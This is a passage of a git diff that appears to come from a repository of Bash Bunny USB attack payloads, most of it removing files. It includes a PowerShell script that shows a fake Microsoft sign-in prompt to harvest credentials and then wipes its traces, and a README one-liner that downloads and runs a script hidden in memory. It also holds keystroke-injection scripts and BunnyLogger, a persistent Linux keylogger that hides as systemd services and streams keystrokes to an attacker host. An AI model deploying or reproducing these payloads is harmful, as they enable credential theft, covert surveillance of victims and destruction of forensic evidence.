Add-Type -AssemblyName System.Windows.Forms
|
||||
|
||||
[System.Windows.Forms.MessageBox]::Show("Unusual sign-in. Please authenticate your Microsoft Account")
|
||||
|
||||
$creds = Get-Creds
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to save the gathered credentials to a file in the temp directory
|
||||
#>
|
||||
|
||||
echo $creds >> $env:TMP\$FileName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This exfiltrates your loot to the Bash Bunny
|
||||
#>
|
||||
|
||||
Move-Item $env:TMP\$FileName $TARGETDIR\$FileName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to clean up behind you and remove any evidence to prove you were there
|
||||
#>
|
||||
|
||||
# Delete contents of Temp folder
|
||||
|
||||
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||
|
||||
# Delete run box history
|
||||
|
||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||
|
||||
# Delete powershell history
|
||||
|
||||
Remove-Item (Get-PSreadlineOption).HistorySavePath
|
||||
|
||||
# Deletes contents of recycle bin
|
||||
|
||||
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
||||
|
||||
@@ -1,102 +0,0 @@
|
||||

|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# Credz-Plz
|
||||
|
||||
A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.
|
||||
|
||||
## Description
|
||||
|
||||
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
|
||||
This will be followed by a fake authentication ui prompt.
|
||||
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
|
||||
Once the target enters their credentials their information will be uploaded to your dropbox for collection
|
||||
|
||||

|
||||
|
||||

|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* DropBox or other file sharing service - Your Shared link for the intended file
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
||||
```
|
||||
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
@@ -1,22 +0,0 @@
|
||||
# Title: Credz-Plz
|
||||
# Description: A script used to prompt the target to enter their creds to later be exfiltrated to the Bash Bunny
|
||||
# Author: I am Jakoby
|
||||
# Version: 1.0
|
||||
# Category: Recon
|
||||
# Attackmodes: HID, Storage
|
||||
# Target: Windows 10, 11
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED STAGE1
|
||||
|
||||
QUACK DELAY 3000
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
LED STAGE2
|
||||
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Credz-Plz.ps1')"
|
||||
QUACK ENTER
|
||||
Binary file not shown.
|
Before Width: | Height: | Size: 73 KiB |
Binary file not shown.
|
Before Width: | Height: | Size: 39 KiB |
@@ -1,13 +1,19 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: BruteBunny
|
||||
# Author: Decoy
|
||||
# Version: 1.0
|
||||
# Category: Password Recovery
|
||||
# Target: Windows XP SP3+
|
||||
# Title: BruteBunny
|
||||
# Author: Decoy
|
||||
# Version: 1.0
|
||||
# Target: Windows XP SP3+
|
||||
#
|
||||
# Description: Will attempt to bruteforce common router username/password combinations in an attempt to gain
|
||||
# access to the admin panel.
|
||||
# Description:
|
||||
# Will attempt to bruteforce common router username/password combinations in an attempt to gain
|
||||
# access to the admin panel.
|
||||
#
|
||||
# LEDS:
|
||||
# Magenta: Setup
|
||||
# Yellow Blink: Attack Stage 1
|
||||
# Yellow Double Blink: Attack Stage 2
|
||||
# Green Rapid to Solid: Finished
|
||||
|
||||
# init
|
||||
LED SETUP
|
||||
|
||||
@@ -1,62 +0,0 @@
|
||||
## About:
|
||||
* Title: BunnyLogger
|
||||
* Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||
* AUTHOR: drapl0n
|
||||
* Version: 1.0
|
||||
* Category: Credentials
|
||||
* Target: Unix-like operating systems with systemd.
|
||||
* Attackmodes: HID, Storage
|
||||
|
||||
## BunnyLogger: BunnyLogger is a Key Logger which captures every key stroke of traget and send them to attacker.
|
||||
|
||||
### Features:
|
||||
* Live keystroke capturing.
|
||||
* Detailed key logs.
|
||||
* Persistent
|
||||
* Autostart payload on boot.
|
||||
|
||||
### Workflow:
|
||||
* Encoding payload and injecting on target's system.
|
||||
* Checks whether internet is connected to the target system.
|
||||
* If internet is connected then it sends raw keystrokes to attacker.
|
||||
* Attacker processes raw keystrokes.
|
||||
|
||||
### Changes to be made in payload.sh:
|
||||
* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `11`.
|
||||
* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `15`.
|
||||
|
||||
### LED Status:
|
||||
* `SETUP` : MAGENTA
|
||||
* `ATTACK` : YELLOW
|
||||
* `FINISH` : GREEN
|
||||
|
||||
### Directory Structure of payload components:
|
||||
| FileName | Directory |
|
||||
| -------------- | ----------------------------- |
|
||||
| payload.txt | /payload/switch1/ |
|
||||
| payload.sh | /payload/ |
|
||||
| xinput | /tools/ |
|
||||
|
||||
### Usage:
|
||||
1. Encode payload.txt and inject into target's system.
|
||||
2. Start netcat listner on attacking system:
|
||||
|
||||
* `nc -lvp <port number> > <log filename>` use this command to create new logfile with raw keystrokes.
|
||||
* `nc -lvp <port number> >> <log filename>` use this command to append raw keystrokes to existing logfile.
|
||||
3. Process raw keystrokes using BunnyLoggerDecoder utility:
|
||||
```
|
||||
./bunnyLoggerDecoder
|
||||
bunnyLoggerDecoder is used to decode raw key strokes acquired by bunnyLogger.
|
||||
|
||||
Usage:
|
||||
Decode captured log: [./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]
|
||||
|
||||
Options:
|
||||
-f Specify Log file.
|
||||
-m Select Mode(normal|informative)
|
||||
-o Specify Output file.
|
||||
-h For this banner.
|
||||
```
|
||||
|
||||
#### Support me if you like my work:
|
||||
* https://twitter.com/drapl0n
|
||||
@@ -1,50 +0,0 @@
|
||||
usage () {
|
||||
echo -e "BunnyLoggerDecoder is used to decode raw key strokes acquired by BunnyLogger.\n"
|
||||
echo -e "Usage: \nDecode captured log:\t[./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]";
|
||||
echo -e "\nOptions:"
|
||||
echo -e "-f\tSpecify Log file."
|
||||
echo -e "-m\tSelect Mode(normal|informative)"
|
||||
echo -e "-o\tSpecify Output file."
|
||||
echo -e "-h\tFor this banner."
|
||||
}
|
||||
while getopts o:m:f:h: flag
|
||||
do
|
||||
case "${flag}" in
|
||||
o) output=$OPTARG ;;
|
||||
m) mode=$OPTARG ;;
|
||||
f) filename=$OPTARG ;;
|
||||
h) help=$OPTARG ;;
|
||||
*)
|
||||
usage
|
||||
exit 1
|
||||
esac
|
||||
done
|
||||
|
||||
if [ -z "$output" ] && [ -z "$filename" ]; then
|
||||
usage
|
||||
exit 1
|
||||
fi
|
||||
if [ -z "$filename" ]; then
|
||||
echo -e "BunnyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ -z "$output" ]; then
|
||||
echo -e "BunnyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ -z "$mode" ]; then
|
||||
echo -e "BunnyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
|
||||
echo -e "BunnyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ "$mode" == "normal" ] ; then
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
|
||||
exit 1
|
||||
fi
|
||||
if [ "$mode" == "informative" ] ; then
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
|
||||
exit 1
|
||||
fi
|
||||
@@ -1,24 +0,0 @@
|
||||
#!/bin/bash
|
||||
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||
mkdir /var/tmp/.system
|
||||
lol=$(lsblk | grep 1.8G)
|
||||
disk=$(echo $lol | awk '{print $1}')
|
||||
mntt=$(lsblk | grep $disk | awk '{print $7}')
|
||||
cp -r $mntt/tools/xinput /var/tmp/.system/
|
||||
echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
|
||||
chmod +x /var/tmp/.system/sys
|
||||
chmod +x /var/tmp/.system/xinput
|
||||
echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
||||
chmod +x /var/tmp/.system/systemBus
|
||||
mkdir -p ~/.config/systemd/user
|
||||
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
|
||||
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
|
||||
chmod +x /var/tmp/.system/reboot
|
||||
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
|
||||
systemctl --user daemon-reload
|
||||
systemctl --user enable --now systemBUS.service
|
||||
systemctl --user start --now systemBUS.service
|
||||
systemctl --user enable --now reboot.service
|
||||
systemctl --user start --now reboot.service
|
||||
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
|
||||
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
|
||||
@@ -1,56 +0,0 @@
|
||||
# Title: BunnyLogger
|
||||
# Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||
# AUTHOR: drapl0n
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: Unix-like operating systems with systemd.
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID
|
||||
GET SWITCH_POSITION
|
||||
LED ATTACK
|
||||
Q DELAY 1000
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
|
||||
# [Prevent storing history]
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Fetching BashBunny's block device]
|
||||
Q STRING lol='$(lsblk | grep 1.8G)'
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Mounting BashBunny]
|
||||
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [transfering payload script]
|
||||
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
|
||||
Q ENTER
|
||||
Q STRING chmod +x /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q STRING /tmp/./payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING rm /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [Unmounting BashBunny]
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
LED FINISH
|
||||
Binary file not shown.
@@ -1,39 +0,0 @@
|
||||
## About:
|
||||
* Title: BunnyLogger 2.0
|
||||
* Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||
* AUTHOR: drapl0n
|
||||
* Version: 1.0
|
||||
* Category: Credentials
|
||||
* Target: Unix-like operating systems with systemd.
|
||||
* Attackmodes: HID, Storage
|
||||
|
||||
## BunnyLogger 2.0: BunnyLogger is a Key Logger which captures every key stroke of target and send them to attacker.
|
||||
|
||||
### Features:
|
||||
* Live keystroke capturing.
|
||||
* Stored Keystroke capturing.
|
||||
* Bunny Logger Manager: Interactive TUI Dashboard.
|
||||
* Detailed key logs.
|
||||
* Persistent.
|
||||
* Autostart payload on boot.
|
||||
|
||||
### Directory Structure of payload components:
|
||||
|
||||
| FileName | Directory |
|
||||
| -------------- | ------------------------------ |
|
||||
| payload.txt | /payload/switch1/ |
|
||||
| payload.sh | /payload/ |
|
||||
| requirements/* | /payloads/library/bunnyLogger2 |
|
||||
|
||||
### LED Status:
|
||||
|
||||
* `LED SETUP` : MAGENTA
|
||||
* `LED ATTACK` : YELLOW
|
||||
* `LED FINISH` : GREEN
|
||||
|
||||
### Usage:
|
||||
* Install BunnyLogger 2.0: `chmod +x install.sh && sudo ./install.sh`
|
||||
* Run : `bunnyLoggerMgr` to launch BunnyLogger Manager.
|
||||
|
||||
#### Support me if you like my work:
|
||||
* https://twitter.com/drapl0n
|
||||
@@ -1,7 +0,0 @@
|
||||
#!/bin/bash
|
||||
loc=$HOME/.config/bunnyLogger
|
||||
mkdir $loc
|
||||
cp requirements/payload.sh $loc
|
||||
touch $loc/bunnyLogger.db
|
||||
chmod +x requirements/bunnyLoggerMgr
|
||||
sudo cp requirements/bunnyLoggerMgr /usr/local/bin/
|
||||
@@ -1,53 +0,0 @@
|
||||
# Title: BunnyLogger
|
||||
# Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||
# AUTHOR: drapl0n
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: Unix-like operating systems with systemd.
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID
|
||||
GET SWITCH_POSITION
|
||||
LED ATTACK
|
||||
Q DELAY 1000
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
|
||||
# [Prevent storing history]
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Fetching BashBunny's block device]
|
||||
Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Mounting BashBunny]
|
||||
Q STRING udisksctl mount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [transfering payload script]
|
||||
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
|
||||
Q ENTER
|
||||
Q STRING chmod +x /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q STRING /tmp/./payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING rm /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [Unmounting BashBunny]
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
LED FINISH
|
||||
@@ -1,191 +0,0 @@
|
||||
#!/bin/bash
|
||||
allowAbort=true;
|
||||
myInterruptHandler()
|
||||
{
|
||||
if $allowAbort; then
|
||||
echo
|
||||
echo -e "\n\033[1;34m[INFO]: \e[0mYou terminated bunnyLoggerMgr..." && exit 1;
|
||||
fi;
|
||||
}
|
||||
trap myInterruptHandler SIGINT
|
||||
echo -e "\033[4m\033[1mWelcome to BunnyLogger Manager!!!\033[0m"
|
||||
echo
|
||||
echo -e "1] Fetch Keylogs.\n2] Create new target.\n3] List available target.\n4] Remove target.\n5] Update target.\n6] Decode Key Logs."
|
||||
echo
|
||||
read -p "Enter your choice: " ch
|
||||
create(){
|
||||
read -p "Enter Target's name(without whitespaces): " name
|
||||
if [[ $(grep -oh "\w*$name\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $name ]]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mName \"$name\" already exists."
|
||||
exit 1
|
||||
fi
|
||||
read -p "Enter Servers IP: " ip
|
||||
read -p "Enter Unique Port Number(1500-65535): " port
|
||||
read -p "Enter another Unique Port Number(1500-65535): " secPort
|
||||
if [ "$port" == "$secPort" ]; then
|
||||
echo -e "\033[1;34m[INFO]: \033[0mTwo ports can't be similar."
|
||||
exit 1
|
||||
fi
|
||||
if [[ $(grep -oh "\w*$ip\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $ip ]] && [[ $(grep -oh "\w*$port\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $port ]] && [[ $(grep -oh "\w*$secPort\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $secPort ]]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mTarget exist with similar IP address \"$ip\" and port number one \"$port\", port number two \"$secPort\"."
|
||||
exit 1
|
||||
fi
|
||||
max=65535
|
||||
min=1500
|
||||
if [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && (( $port <= $max )) && (( $port >= $min )) && (( $secPort <= $max )) && (( $secPort >= $min )); then
|
||||
read -p "Specify directory for output: " dir
|
||||
if [ ! -d "$dir" ]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
|
||||
exit 1
|
||||
else
|
||||
cp -r ~/.config/bunnyLogger/payload.sh $dir
|
||||
fi
|
||||
sed -i -e "s/0.0.0.0/$ip/g" $dir/payload.sh
|
||||
sed -i -e "s/4444/$port/g" $dir/payload.sh
|
||||
sed -i -e "s/5555/$secPort/g" $dir/payload.sh
|
||||
echo -e "$(echo "$name"|xargs)\t$ip\t$port\t$secPort" >> ~/.config/bunnyLogger/bunnyLogger.db
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$ip\" or Port Number \"$port\" or Port Number \"$secPort\"."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
}
|
||||
list(){
|
||||
|
||||
column -t -o ' ' ~/.config/bunnyLogger/bunnyLogger.db | awk '{print NR" - "$0}'
|
||||
}
|
||||
remove(){
|
||||
echo
|
||||
list
|
||||
echo
|
||||
read -p "Enter name of target to remove: " rmv
|
||||
if grep -q $rmv ~/.config/bunnyLogger/bunnyLogger.db; then
|
||||
sed -i "/\b\($rmv\)\b/d" ~/.config/bunnyLogger/bunnyLogger.db
|
||||
echo -e "\033[1;34m\e[1m[INFO]: \e[0m Successfully Removed \"$rmv\"."
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$rmv\" no such target found."
|
||||
fi
|
||||
}
|
||||
update(){
|
||||
echo
|
||||
list
|
||||
echo
|
||||
read -p "Choose target number: " cho
|
||||
read -p "You want to update (ip|portOne|portTwo): " ent
|
||||
if [ "$ent" = ip ]
|
||||
then
|
||||
one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
|
||||
read -p "Enter new ip: " use
|
||||
if [[ $use =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
|
||||
sed -i -e "$cho s/$one/$use/g" ~/.config/bunnyLogger/bunnyLogger.db
|
||||
echo -e "\033[1;34m\e[1m[INFO]: \e[0mSuccessfully Updated IP."
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$use\"."
|
||||
exit
|
||||
fi
|
||||
elif [ "$ent" = portOne ]
|
||||
then
|
||||
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
|
||||
read -p "Enter new Port number: " useP
|
||||
max=65535
|
||||
min=1500
|
||||
if (( $useP <= $max )) && (( $useP >= $min )); then
|
||||
sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
|
||||
echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
|
||||
fi
|
||||
elif [ "$ent" = portTwo ]
|
||||
then
|
||||
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
|
||||
read -p "Enter new Port number: " useP
|
||||
max=65535
|
||||
min=1500
|
||||
if (( $useP <= $max )) && (( $useP >= $min )); then
|
||||
sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
|
||||
echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
|
||||
fi
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e0m[Invalid choice \"$ent\"."
|
||||
fi
|
||||
}
|
||||
fetch(){
|
||||
echo
|
||||
list
|
||||
echo
|
||||
read -p "Enter Target number to connect: " cho
|
||||
one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
|
||||
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
|
||||
three=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
|
||||
echo -en "1] Live Capture \t2]Fetch Stored Logs: "
|
||||
read typ
|
||||
case $typ in
|
||||
1)
|
||||
read -p "Specify directory for output: " dir
|
||||
read -p "Enter filename to store logs: " filename
|
||||
if [ ! -d "$dir" ]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
|
||||
exit 1
|
||||
else
|
||||
echo "\033[1;34m\e[1m[[INFO]: \e[0mStarted Keylogs Capture..."
|
||||
nc -lvp $two > $dir/$filename.log
|
||||
fi
|
||||
;;
|
||||
2)
|
||||
read -p "Specify directory for output: " dir
|
||||
read -p "Enter filename to store logs: " filename
|
||||
if [ ! -d "$dir" ]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
|
||||
exit 1
|
||||
else
|
||||
nc -lvp 1444 > $dir/$filename.log &
|
||||
nc -lvp $three
|
||||
fi
|
||||
;;
|
||||
*)
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice.."
|
||||
;;
|
||||
esac
|
||||
}
|
||||
decode(){
|
||||
echo -e "1] Normal Decode \t2] Informative Decode"
|
||||
read -p "Enter your choice: " cho
|
||||
read -p "Enter path of file to decode: " path
|
||||
read -p "Enter path for decoded log: " out
|
||||
case $cho in
|
||||
1)
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path | grep press | awk '{print $4}' > $out
|
||||
;;
|
||||
2)
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path > $out
|
||||
;;
|
||||
*)
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice \"$cho\"."
|
||||
;;
|
||||
esac
|
||||
}
|
||||
case $ch in
|
||||
1)
|
||||
fetch
|
||||
;;
|
||||
2)
|
||||
create
|
||||
;;
|
||||
3)
|
||||
list
|
||||
;;
|
||||
4)
|
||||
update
|
||||
;;
|
||||
5)
|
||||
remove
|
||||
;;
|
||||
6)
|
||||
decode
|
||||
;;
|
||||
*)
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: Invalid Choice \"$ch\"."
|
||||
;;
|
||||
esac
|
||||
@@ -1,41 +0,0 @@
|
||||
#!/bin/bash
|
||||
transfer(){
|
||||
echo -e "\033[1;34m[INFO]: Target Logs:\033[0m"
|
||||
cd /var/tmp/.system/logs/
|
||||
ls /var/tmp/.system/logs/ | sort
|
||||
echo
|
||||
echo -n "Enter filename to transfer: "
|
||||
read ch
|
||||
if [ -f $ch ];
|
||||
then
|
||||
echo -e "\033[1;34m[INFO]: Transferring file...\033[0m"
|
||||
/var/tmp/.system/./nc -q 0 127.0.0.1 1444 < $ch >/dev/null 2>&1
|
||||
if [ $? -eq 0 ]; then
|
||||
echo -e "\033[1;32m[SUCCESS]: File Transferred.\033[0m"
|
||||
else
|
||||
echo -e "\033[1;34m[INFO]: Netcat listner is not running on Attacking system.\033[0m\n\033[1;31m[ERROR]: File transfer failed.\033[0m"
|
||||
fi
|
||||
else
|
||||
echo -e "\033[1;31m[ERROR]: Invalid Filename \"$ch\".\033[0m"
|
||||
fi
|
||||
}
|
||||
conti(){
|
||||
while :
|
||||
do
|
||||
echo
|
||||
echo -n "Would you like to transfer more files? [Y/N]: "
|
||||
read ch
|
||||
if [ "$ch" = y ] || [ "$ch" = Y ];
|
||||
then
|
||||
transfer
|
||||
elif [ "$ch" = N ] || [ "$ch" = n ];
|
||||
then
|
||||
echo -e "\033[1;34m[INFO]: Terminating...\033[0m"
|
||||
break
|
||||
else
|
||||
echo -e "\033[1;31m[ERROR]: Invalid Choice \"$ch\".\033[0m"
|
||||
fi
|
||||
done
|
||||
}
|
||||
transfer
|
||||
conti
|
||||
Binary file not shown.
@@ -1,28 +0,0 @@
|
||||
#!/bin/bash
|
||||
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||
mkdir -p /var/tmp/.system/logs
|
||||
lol=$(lsblk | grep 1.8G)
|
